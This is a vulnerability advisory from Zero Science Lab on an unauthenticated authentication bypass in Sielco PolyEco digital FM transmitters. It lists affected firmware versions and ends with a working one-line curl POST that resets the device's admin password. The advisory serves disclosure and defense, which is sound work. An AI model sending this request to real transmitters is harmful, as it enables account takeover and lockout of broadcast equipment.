Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass

Sielco PolyEco Digital FM Transmitter 2.0.6 Account Takeover / Lockout / EoPVendor: Sielco S.r.lProduct web page: https://www.sielco.orgAffected version: PolyEco1000 CPU:2.0.6 FPGA:10.19                  PolyEco1000 CPU:1.9.4 FPGA:10.19                  PolyEco1000 CPU:1.9.3 FPGA:10.19                  PolyEco500 CPU:1.7.0 FPGA:10.16                  PolyEco300 CPU:2.0.2 FPGA:10.19                  PolyEco300 CPU:2.0.0 FPGA:10.19Summary: PolyEco is the innovative family of high-end digitalFM transmitters of Sielco. They are especially suited as highperformance power system exciters or compact low-mid powertransmitters. The same cabinet may in fact be fitted with 50,100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,1000).All features can be controlled via the large touch-screen display4.3" or remotely. Many advanced features are inside by defaultin the basic version such as: stereo and RDS encoder, audiochange-over, remote-control via LAN and SNMP, "FFT" spectralanalysis of the audio sources, SFN synchronization and much more.Desc: The application suffers from an authentication bypass,account takeover/lockout and elevation of privileges vulnerabilitythat can be triggered by directly calling the users object andeffectively modifying the password of the two constants user/role(user/admin). This can be exploited by an unauthenticated adversaryby issuing a single POST request to the vulnerable endpoint andgain unauthorized access to the affected device with administrativeprivileges.Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5765Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php26.01.2023--# Change admin pwd$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm